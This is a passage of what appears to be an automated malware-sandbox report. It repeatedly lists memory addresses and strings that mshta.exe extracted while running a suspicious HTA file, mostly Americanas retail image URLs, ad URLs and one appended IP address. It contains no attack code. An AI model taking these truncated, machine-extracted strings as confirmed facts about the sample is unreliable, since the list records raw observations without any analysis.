00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538835391.0000000005158000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540350568.0000000005D34000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://empresas.americanas.com.br/?chave=menuacom_aemp_hmem
Source: mshta.exe, 00000000.00000003.538629144.000000000070C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://empresas.americanas.com.br/?chave=menuacom_aemp_hmemq
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538457983.000000000517C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539754578.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538862819.000000000515E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484354237.0000000000C91000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484324614.0000000000C90000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.0000000005185000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538835391.0000000005158000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://empresas.americanas.com.br/hotsite/empresas-cotacao-online?chave=menuacom_aemp_cotacoes
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539754578.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538862819.000000000515E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484354237.0000000000C91000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484324614.0000000000C90000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538835391.0000000005158000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://empresas.americanas.com.br/hotsite/receba-ou-retire-hoje?chave=menuacom_aemp_recebaem3h
Source: mshta.exe, 00000000.00000003.519678169.0000000005BF8000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540374546.0000000005E1A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537630543.0000000005E1A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540858944.0000000005D35000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540201462.0000000005D2C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539930695.000000000070D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540350568.0000000005D34000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538243144.0000000000743000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537933006.0000000007B6A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.0000000007B6A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484369993.0000000000C82000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007B6A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538952952.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.542489956.0000000007B6A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538952952.00000000006D0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539726653.00000000043D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540922781.00000000006CA000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://images-americanas.b2w.io
Source: mshta.exe, 00000000.00000003.538629144.000000000070C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/catalog-statics/acom/favicon-americanas.icox
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484305682.0000000005378000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537630543.0000000005DAE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://images-americanas.b2w.io/produtos/01/00/img3/13439422/9/1343942201G1.jpg
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484305682.0000000005378000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537630543.0000000005DAE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://images-americanas.b2w.io/produtos/01/00/img3/13439422/9/1343942201P.jpg
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484305682.0000000005378000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537630543.0000000005DAE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://images-americanas.b2w.io/produtos/01/00/img3/13439422/9/1343942201P1.jpg
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484305682.0000000005378000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537630543.0000000005DAE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://images-americanas.b2w.io/produtos/01/00/img3/13439422/9/1343942201_1GG.jpg
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537630543.0000000005DAE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://images-americanas.b2w.io/produtos/01/00/img3/13439422/9/1343942201_1SZ.jpg
Source: mshta.exe, 00000000.00000003.484305682.0000000005378000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/produtos/01/00/img3/13439422/9/1343942201_1SZ.jpgproduct.ratingprod
Source: mshta.exe, 00000000.00000003.484305682.0000000005378000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535351898.0000000005337000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537630543.0000000005DAE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535471671.000000000533C000.00000004.00000800.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://images-americanas.b2w.io/produtos/5008766730/imagens/bicicleta-aro-24-kls-sport-gold-freio-v
Source: mshta.exe, 00000000.00000003.484305682.0000000005378000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535810043.000000000530B000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535449726.0000000005307000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535589591.0000000005309000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535199624.0000000005307000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537630543.0000000005DAE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535798250.0000000003464000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://images-americanas.b2w.io/produtos/5271512690/imagens/fritadeira-air-fryer-philco-chrome-5-5-
Source: mshta.exe, 00000000.00000003.484305682.0000000005378000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535810043.000000000530B000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535449726.0000000005307000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535589591.0000000005309000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535199624.0000000005307000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535351898.0000000005337000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537630543.0000000005DAE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://images-americanas.b2w.io/produtos/60405799/imagens/ck-be-calvin-klein-eau-de-toilette-perfum
Source: mshta.exe, 00000000.00000003.484305682.0000000005378000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535449726.0000000005307000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535589591.0000000005309000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535199624.0000000005307000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537630543.0000000005DAE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535775149.000000000530C000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://images-americanas.b2w.io/produtos/7211551574/imagens/sunga-masculina-adidas-3-listras/721155
Source: mshta.exe, 00000000.00000003.484305682.0000000005378000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537630543.0000000005DAE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.534806210.00000000052DA000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535199624.0000000005301000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535597591.0000000005303000.00000004.00000800.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://images-americanas.b2w.io/produtos/7503637854/imagens/conjunto-com-40-bolas-de-4cm-vermelha-e
Source: mshta.exe, 00000000.00000003.484305682.0000000005378000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535810043.000000000530B000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535449726.0000000005307000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535589591.0000000005309000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535199624.0000000005307000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537630543.0000000005DAE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://images-americanas.b2w.io/produtos/7510984342/imagens/cordao-300-leds-30-metros-8-funcoes-bra
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.000000000443E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539726653.00000000043D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539662366.0000000004460000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540937966.0000000004481000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484331936.0000000005367000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.548436103.0000000004482000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539528256.0000000005D8E000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2021/03/05/americanassocial_app.png
Source: mshta.exe, 00000000.00000003.535486328.0000000005344000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535351898.0000000005337000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535471671.000000000533C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2021/03/05/americanassocial_app.png138.59.131.85
Source: mshta.exe, 00000000.00000003.548350262.00000000051D4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.00000000051D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539944087.00000000051D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2021/03/05/americanassocial_app.pngy
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.00000000051D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539726653.00000000043D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484331936.0000000005367000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539528256.0000000005D8E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535486328.000000000534B000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535351898.000000000534B000.00000004.00000800.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2022/04/05/App-15b552bb657a.png
Source: mshta.exe, 00000000.00000003.548607709.00000000051F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540298823.00000000051EF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.00000000051D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539944087.00000000051D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2022/04/05/App-15b552bb657a.pngj
Source: mshta.exe, 00000000.00000003.537786668.0000000004494000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.548436103.0000000004494000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540937966.0000000004494000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539662366.0000000004494000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2022/04/05/App-15b552bb657a.pngx-cb8bf5b6c936.png9.png
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537630543.0000000005E24000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539726653.00000000043D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539528256.0000000005D8E000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2022/04/08/thumbnail_BannerAPP_07-04-3ef281a2ba9f.jpg
Source: mshta.exe, 00000000.00000003.537786668.0000000004494000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.548436103.0000000004494000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540937966.0000000004494000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539662366.0000000004494000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2022/04/08/thumbnail_BannerAPP_07-04-3ef281a2ba9f.jpgng
Source: mshta.exe, 00000000.00000003.537786668.0000000004494000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.548436103.0000000004494000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540937966.0000000004494000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539662366.0000000004494000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2022/04/08/thumbnail_BannerAPP_07-04-3ef281a2ba9f.jpgy-
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538850057.0000000005165000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539805523.0000000005166000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539754578.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.00000000051D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484354237.0000000000C91000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484324614.0000000000C90000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539944087.00000000051D4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538835391.0000000005158000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2022/07/15/_informatica-a6061b57bcbc.png
Source: mshta.exe, 00000000.00000003.538243144.000000000072D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538457983.000000000517C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539754578.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539528256.0000000005DCD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484354237.0000000000C91000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484324614.0000000000C90000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535351898.0000000005337000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537630543.0000000005DAE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538457983.0000000005172000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2022/08/01/LG-Agosto-01082022_americanas-home-banner-TT
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538457983.000000000517C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539754578.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.000000000443E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535449726.0000000005307000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540707630.000000000443E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.00000000051D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535589591.0000000005309000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535199624.0000000005307000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484354237.0000000000C91000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484324614.0000000000C90000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539944087.00000000051D4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 